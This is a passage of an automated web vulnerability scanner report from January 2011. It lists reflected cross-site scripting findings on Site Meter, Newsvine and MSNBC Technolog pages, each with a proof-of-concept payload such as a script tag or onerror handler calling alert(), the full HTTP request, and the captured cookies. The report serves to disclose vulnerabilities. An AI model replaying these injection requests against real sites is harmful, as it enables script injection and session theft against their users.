5.223. http://s18.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s18.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf87'%3balert(1)//d9b40ce8ee5 was submitted in the site parameter. This input was echoed as acf87';alert(1)//d9b40ce8ee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=s18neumediaacf87'%3balert(1)//d9b40ce8ee5 HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7304
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:00:18 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s18neumediaacf87';alert(1)//d9b40ce8ee5', 's18.sitemeter.com', '');

var g_sLastCodeName = 's18neumediaacf87';alert(1)//d9b40ce8ee5';
// ]]>
...[SNIP]...

5.224. http://suzanne-choney.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://suzanne-choney.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a101"-alert(1)-"af1288a8236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?8a101"-alert(1)-"af1288a8236=1 HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6bd6099d7f38f27c6294da411be59d89; expires=Sat, 25-Jan-2031 02:19:53 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
urrentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1477090","http://suzanne-choney.newsvine.com/?8a101"-alert(1)-"af1288a8236=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.225. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:06:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243794

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_nv/more/section4b45d"><script>alert(1)</script>9351ab4d91b/archive?year=2011&month=1&ct=a&pc=25&sp=25#January 2011 archive_nav">
...[SNIP]...

5.230. http://technolog.msnbc.redacted/_nv/more/section/archive [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_nv/more/section/archive

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc67a"><script>alert(1)</script>e360a73df87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_nv/more/section/archivebc67a"><script>alert(1)</script>e360a73df87 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:06:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243794

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_nv/more/section/archivebc67a"><script>alert(1)</script>e360a73df87?year=2011&month=1&ct=a&pc=25&sp=25#January 2011 archive_nav">
...[SNIP]...

5.231. http://technolog.msnbc.redacted/_vine/printer [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b7e29<img%20src%3da%20onerror%3dalert(1)>626a72a1b57 was submitted in the path parameter. This input was echoed as b7e29<img src=a onerror=alert(1)>626a72a1b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=technolog&path=/_news/2011/01/28/*)(sn=*/b7e29<img%20src%3da%20onerror%3dalert(1)>626a72a1b57 HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:34:46 GMT
Connection: close
Content-Length: 529

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
me":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"20126474","domainName":"technolog","displayName":"Technolog","avatar":null,"path":"\/_news\/2011\/01\/28\/*)(sn=*\/b7e29<img src=a onerror=alert(1)>626a72a1b57"},"revision":"23247"}

5.232. http://technolog.msnbc.redacted/amazon [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/amazon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebb0d"><script>alert(1)</script>11a092cdb61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /amazon?ebb0d"><script>alert(1)</script>11a092cdb61=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.233. http://technolog.msnbc.redacted/app-store [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/app-store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de647"><script>alert(1)</script>42a1c3fcb72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app-store?de647"><script>alert(1)</script>42a1c3fcb72=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.234. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/blackberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71720"><script>alert(1)</script>843771bf362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blackberry?71720"><script>alert(1)</script>843771bf362=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.235. http://technolog.msnbc.redacted/ces-2011 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/ces-2011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61aa0"><script>alert(1)</script>3a7cba410e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ces-2011?61aa0"><script>alert(1)</script>3a7cba410e1=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.236. http://technolog.msnbc.redacted/citizen-gamer [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/citizen-gamer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a859"><script>alert(1)</script>8ee81155fd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /citizen-gamer?1a859"><script>alert(1)</script>8ee81155fd4=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.237. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/facebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f76"><script>alert(1)</script>f73888e7cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook?28f76"><script>alert(1)</script>f73888e7cc2=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.238. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/featured

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c2b"><script>alert(1)</script>03f1adeb751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured?18c2b"><script>alert(1)</script>03f1adeb751=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.239. http://technolog.msnbc.redacted/google [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/google

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71cf2"><script>alert(1)</script>12874fc86d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /google?71cf2"><script>alert(1)</script>12874fc86d7=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.240. http://technolog.msnbc.redacted/internet [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeb87"><script>alert(1)</script>a704b07fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /internet?aeb87"><script>alert(1)</script>a704b07fdd2=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.241. http://technolog.msnbc.redacted/ipad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/ipad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4d5"><script>alert(1)</script>6ef19b0523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad?cc4d5"><script>alert(1)</script>6ef19b0523=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.242. http://technolog.msnbc.redacted/iphone [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d48e"><script>alert(1)</script>7c0d864a257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone?6d48e"><script>alert(1)</script>7c0d864a257=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.243. http://technolog.msnbc.redacted/itunes [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/itunes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658d8"><script>alert(1)</script>b143555169b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /itunes?658d8"><script>alert(1)</script>b143555169b=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.244. http://technolog.msnbc.redacted/microsoft [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/microsoft

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce941"><script>alert(1)</script>7e4339e6fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /microsoft?ce941"><script>alert(1)</script>7e4339e6fe9=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.245. http://technolog.msnbc.redacted/motion-controls [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/motion-controls

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78079"><script>alert(1)</script>78bad224f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /motion-controls?78079"><script>alert(1)</script>78bad224f9c=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.246. http://technolog.msnbc.redacted/online-privacy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/online-privacy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf78"><script>alert(1)</script>dfde2d718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

